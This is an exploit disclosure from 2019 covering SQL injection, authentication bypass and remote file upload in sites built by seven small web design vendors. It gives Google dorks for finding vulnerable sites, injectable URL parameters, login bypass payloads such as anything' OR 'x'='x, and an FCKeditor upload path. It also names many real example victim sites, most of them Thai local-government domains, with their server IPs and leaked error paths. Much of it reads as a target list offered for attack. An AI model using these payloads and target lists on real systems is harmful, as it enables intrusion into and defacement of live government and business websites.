7 Different Vendors Web Designs SQL Injection 25/01/2019

1. ####################################################################
2.  
3. # Exploit Title : Vinayak * Royalways * Apurva Infosystems AxisCompuTech
4. * Hands in Technology * Computerization Cell * TimesMedia Hosting * VivaDizayn *
5. SQL Injection / Authentication Bypass / Remote File Upload
6. ------------------------------------------------------------------------------------------------
7. # Author [ Discovered By ] : KingSkrupellos
8. # Team : Cyberizm Digital Security Army
9. # Date : 26/01/2019
10. # Vendor Homepages of Vulnerable Products :
11. 1) vinayak.com
12. 2) royalways.com
13. 3) apurvainfosystems.com - axiscomputech.in
14. 4) handsintechnology.com
15. 5) wbprd.nic.in
16. 6) timesmedia.co.th
17. 7) vivadizayn.com
18. # Tested On : Windows and Linux
19. # Category : WebApps
20. # Exploit Risk : Medium
21. # Vulnerability Type : CWE-89 [ Improper Neutralization of
22. Special Elements used in an SQL Command ('SQL Injection') ]
23. CWE-264 [ Permissions, Privileges, and Access Controls ]
24. CWE-592 [ Authentication Bypass Issues ]
25.  
26. ####################################################################
27.  
28. # There are 6 vendors that their products suffer from remote SQL Injection Vulnerabilities.
29. ***************************************************************************
30.  
31. 1) Designed by Vinayak SQL Injection Vulnerability
32.  
33. 2) Website Design By Royalways SQL Injection and Authentication Bypass Vulnerability
34.  
35. 3) Designed by Apurva Infosystems SQL Injection Vulnerability
36.  
37. 4) Powered By Hands in Technology India SQL Injection Vulnerability
38.  
39. 5) Designed & Developed By Computerization Cell
40. National Informatics Centre India SQL Injection Vulnerability
41.  
42. 6) TimesMedia.Co.Th ThailandGov SQL Injection and Multiple Vulnerabilities
43.  
44. 7) Design - Technology VivaDizayn SQL Injection Vulnerability
45.  
46. ####################################################################
47.  
48. # Google Dorks for Vulnerable Different Products :
49. ********************************************
50. 1) intext:designed by Vinayak site:in
51.  
52. 2) intext:Website Design By Royalways
53.  
54. 3) intext:designed by : Apurva Infosystems
55. intext:by Axis Computech & Peripherals Pvt. Ltd.
56.  
57. 4) intext:Powered By : Hands in Technology site:in
58.  
59. 5) intext:Designed & Developed By Computerization Cell
60. intext:Designed and Developed by : National Informatics Centre
61.  
62. 6) inurl:''/select_news.php?news_id='' site:go.th
63.  
64. 7) intext:Design - Technology VivaDizayn
65.  
66. ####################################################################
67.  
68. 1) Designed by Vinayak SQL Injection Vulnerability
69. ********************************************
70. # Google Dork:
71. **************
72. intext:designed by Vinayak site:in
73.  
74. # SQL Injection Exploit :
75. ***********************
76. /campusupdate.php?id=[SQL Injection]
77.  
78. # Example Vulnerable Site :
79. *************************
80. [+] gnct.co.in/campusupdate.php?id=78%27
81.  
82. Note => (50.28.79.232) => There are 369 domains hosted on this server.
83.  
84. Note => (173.236.156.143) => There are 46 domains hosted on this server.
85.  
86. # SQL Database Error :
87. **********************
88. Warning: mysql_connect(): Access denied for user 'gniot_cognew
89. '@'localhost' (using password: YES) in /home/gnctgro7916
90. /gnct.co.in/campusupdate.php on line 42
91.  
92. ####################################################################
93.  
94. 2) Website Design By Royalways SQL Injection and Authentication Bypass Vulnerability
95. **************************************************************************
96. # Google Dork:
97. **************
98. intext:Website Design By Royalways
99.  
100. # SQL Injection Exploit :
101. ***********************
102. /new_arrival.php?count=[SQL Injection]
103.  
104. # Admin Login Path :
105. *******************
106. /admin/
107.  
108. # Authentication Bypass Exploit :
109. *****************************
110. Admin username => '=''or'
111. Admin password => '=''or'
112.  
113. /admin/home.php
114. /admin/add_cat.php
115. /admin/view_cat.php
116. /admin/add_product.php
117. /admin/view_products.php
118. /admin/add_coupon.php
119. /admin/manage_coupons.php
120. /admin/orders_status.php?sort=New
121. /admin/orders_status.php?sort=Pending
122. /admin/orders_status.php?sort=Delivered
123. /admin/manage_shipping.php
124. /admin/manage_currency.php
125. /admin/view_all_users.php
126. /admin/chg_pwd.php
127.  
128. # Example Vulnerable Site :
129. *************************
130. [+] hnh.in/new_arrival.php?count=1%27
131.  
132. Note : (198.49.66.2) => There are 81 domains hosted on this server.
133.  
134. Note : (198.49.66.5) => 1 Domain.
135.  
136. # SQL Database Error :
137. **********************
138. Warning: mysql_num_rows() expects parameter 1 to be
139. resource, boolean given in /home/hnhin/public_html
140. /products_new_arrival.php on line 159
141.  
142. ####################################################################
143.  
144. 3) Designed by Apurva Infosystems SQL Injection Vulnerability
145. ******************************************************
146. # Google Dork :
147. **************
148. intext:designed by : Apurva Infosystems
149. intext:by Axis Computech & Peripherals Pvt. Ltd.
150.  
151. # SQL Injection Exploit :
152. ***********************
153. /index.php?id=[SQL Injection]
154.  
155. /laptops.php?id=[SQL Injection]
156.  
157. # Example Vulnerable Site :
158. *************************
159. [+] lenovoretail.in/index.php?id=1%27
160.  
161. Note : (173.254.75.123) => There are 109 domains hosted on this server.
162.  
163. Note : (208.79.234.118) => There are 90 domains hosted on this server.
164.  
165. # SQL Database Error :
166. **********************
167. Warning: mysql_query(): Access denied for user
168. ''@'localhost' (using password: NO) in /home
169. /lenovoretail/public_html/index.php on line 59
170.  
171. ####################################################################
172.  
173. 4) Powered By Hands in Technology SQL Injection Vulnerability
174. *******************************************************
175. # Google Dork:
176. **************
177. intext:Powered By : Hands in Technology site:in
178.  
179. # SQL Injection Exploit :
180. ***********************
181. /our-campaigns.php?id=[SQL Injection]
182.  
183. # Example Vulnerable Site :
184. *************************
185. [+] struggleforjustice.in/our-campaigns.php?id=93%27
186.  
187. Note : (108.167.158.159) => There are 58 domains hosted on this server.
188.  
189. Note : (166.62.27.182) => There are 1,024 domains hosted on this server.
190.  
191. # SQL Database Error :
192. **********************
193. Deprecated: mysql_query(): The mysql extension is deprecated
194. and will be removed in the future: use mysqli or PDO instead in /home4/x0v7q0n7
195. /public_html/struggleforjustice.in/our-campaigns.php on line 74
196.  
197. ####################################################################
198.  
199. 5) Designed & Developed By Computerization Cell
200. National Informatics Centre India SQL Injection Vulnerability
201. ******************************************************
202. # Google Dork:
203. **************
204. intext:Designed & Developed By Computerization Cell
205. intext:Designed and Developed by : National Informatics Centre
206.  
207. # SQL Injection Exploit :
208. ***********************
209. /monthlyreport/cfcpgmonthlyreport.php?district=[SQL Injection]
210.  
211. # Example Vulnerable Site :
212. *************************
213. [+] wbprdgpms.in/monthlyreport/cfcpgmonthlyreport.php?district=15%27
214.  
215. Note : (164.100.178.145) => 2 Domains.
216.  
217. Note : (202.61.117.157) => 1 Domain.
218.  
219. # SQL Database Error :
220. **********************
221. Warning: mysql_fetch_array(): supplied argument is not a valid
222. MySQL result resource in D:\xampp\htdocs\gpmsstatus
223. \monthlyReport\cfcpgmonthlyreport.php on line 287
224.  
225. ####################################################################
226.  
227. 6) TimesMedia.Co.Th ThailandGov SQL Injection and Multiple Vulnerability
228. ****************************************************************
229. # Google Dork :
230. *****************
231. inurl:''/select_news.php?news_id='' site:go.th
232.  
233. # CopyRight © 2015 www.timesmedia.co.th All Rights Reserved
234.  
235. # Note : Thailand Government WebSites are vulnerable.
236.  
237. # Admin Control Panel Login Path :
238. *******************************
239.  
240. /login_form.php
241. /admin.php
242.  
243. # SQL Injection Exploits :
244. ***********************
245.  
246. /contact.php?content_id=[SQL Injection]
247.  
248. /base.php?content_id=[SQL Injection]
249.  
250. /council.php?content_id=[SQL Injection]
251.  
252. /history.php?content_id=[SQL Injection]
253.  
254. /person.php?content_id=[SQL Injection]
255.  
256. /vision.php?content_id=[SQL Injection]
257.  
258. /memorable.php?content_id=[SQL Injection]
259.  
260. /council.php?content_id=[SQL Injection]
261.  
262. /travel.php?content_id=[SQL Injection]
263.  
264. /stucture.php?content_id=[SQL Injection]
265.  
266. /admin1.php?content_id=[SQL Injection]
267.  
268. /otop.php?content_id=[SQL Injection]
269.  
270. /news.php?id_type=[SQL Injection]
271.  
272. /select_news.php?news_id=[SQL Injection]
273.  
274. /policy.php?content_id=[SQL Injection]
275.  
276. /office.php?content_id=[SQL Injection]
277.  
278. /data.php?content_id=[SQL Injection]
279.  
280. /strategy_plan.php?content_id=[SQL Injection]
281.  
282. /activity/user_select_photo.php?news_id=[SQL Injection]
283.  
284. /vdo/user_select_youtube.php?yt_id=[SQL Injection]
285.  
286. Unauthorized Topic Add without Administrator Permission Exploit =>
287. ***********************************************************
288.  
289. TARGET/webboard/new.php?category=webboard
290.  
291. TARGET/webboard/index.php?category=webboard
292.  
293. Note : Use Mozilla Firefox Open Link No Redirect
294. Extension to Bypass Admin Control Panel
295.  
296. Download and Install on your Browser =>
297.  
298. addons.mozilla.org/en-US/firefox/addon/noredirect/
299.  
300. addons.mozilla.org/en-US/firefox/addon/open-link-directly-no-redirect/
301.  
302. Try to use one of the SQL Authentication Exploit Payloads below if not works =>
303. *******************************************************************
304.  
305. Admin Username : anything' OR 'x'='x
306.  
307. Admin Password : anything' OR 'x'='x
308.  
309. Directory File Path : /fileupload/....
310.  
311. Directory File Path : /activity/images/....
312.  
313. Remote File Upload Exploit =>
314. ****************************
315.  
316. TARGET/admin/FCKeditor/editor/filemanager/upload/test.html
317.  
318. /UserFiles/....
319.  
320. Note : Only Thailand Government WebSites [ go.th ] are vulnerable for this issue.
321.  
322. # Example Vulnerable Sites :
323. **************************
324.  
325. => Vulnerable IP Address => 61.19.250.25 =>
326.  
327. There are 52 domains hosted on this server.
328.  
329. Vendor Homepage Admin Panel => timesmedia.co.th/web58/admin/admin.php
330.  
331. [+] banthan.go.th/policy.php?content_id=1%27 =>
332.  
333. [ Proof of Concept for SQL Inj ] => archive.is/lkrrB
334.  
335. [+] makluakao.go.th/webboard/index.php?category=webboard =>
336.  
337. [ Proof of Concept ] => archive.is/azGk4
338.  
339. [+] phoklang.go.th/news.php?id_type=4%27 =>
340.  
341. [ Proof of Concept for RFU Vuln ] => archive.is/8wk57
342.  
343. [+] chongsammor.go.th/select_news.php?news_id=410%27
344.  
345. [+] dondang.go.th/base.php?content_id=7
346.  
347. [+] hanna-ngam.go.th/admin1.php?content_id=10%27
348.  
349. [+] wattananakhon.go.th/news.php?id_type=6%27
350.  
351. [+] klonghinpoon.go.th/vision.php?content_id=5%27
352.  
353. [+] nongpailomcity.go.th/data.php?content_id=1%27
354.  
355. [+] banphokorat.go.th/data.php?content_id=4%27
356.  
357. [+] buakho.go.th/history.php?content_id=4%27
358.  
359. [+] janaud.go.th/stucture.php?content_id=27%27
360.  
361. [+] waengnoiy.go.th/data.php?content_id=1%27
362.  
363. [+] huanong.go.th/news.php?id_type=21%27
364.  
365. [+] banthan.go.th/policy.php?content_id=1%27
366.  
367. # SQL Database Error :
368. *********************
369.  
370. Warning: mysql_fetch_array() expects parameter 1 to be
371. resource, boolean given in /home/phoklang/
372. domains/phoklang.go.th/public_html/news.php on line 129
373.  
374. ####################################################################
375.  
376. 7) Design - Technology VivaDizayn SQL Injection Vulnerability
377. *****************************************************
378. # Google Dork:
379. **************
380. intext:Design - Technology VivaDizayn
381.  
382. # SQL Injection Exploit :
383. **********************
384. /en/detay.php?id=[SQL Injection]
385.  
386. # Example Vulnerable Site :
387. ************************
388. [+] rovelsan.com.tr/en/detay.php?id=696%27
389.  
390. Note : (185.67.122.66) => There are 210 domains hosted on this server.
391.  
392. # SQL Database Error :
393. *********************
394. Warning: mysql_fetch_array(): supplied argument is not a valid
395. MySQL result resource in /home/rovelsant/domains
396. /rovelsan.com.tr/public_html/en/detay.php on line 20
397.  
398. ####################################################################
399.  
400. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
401.  
402. ####################################################################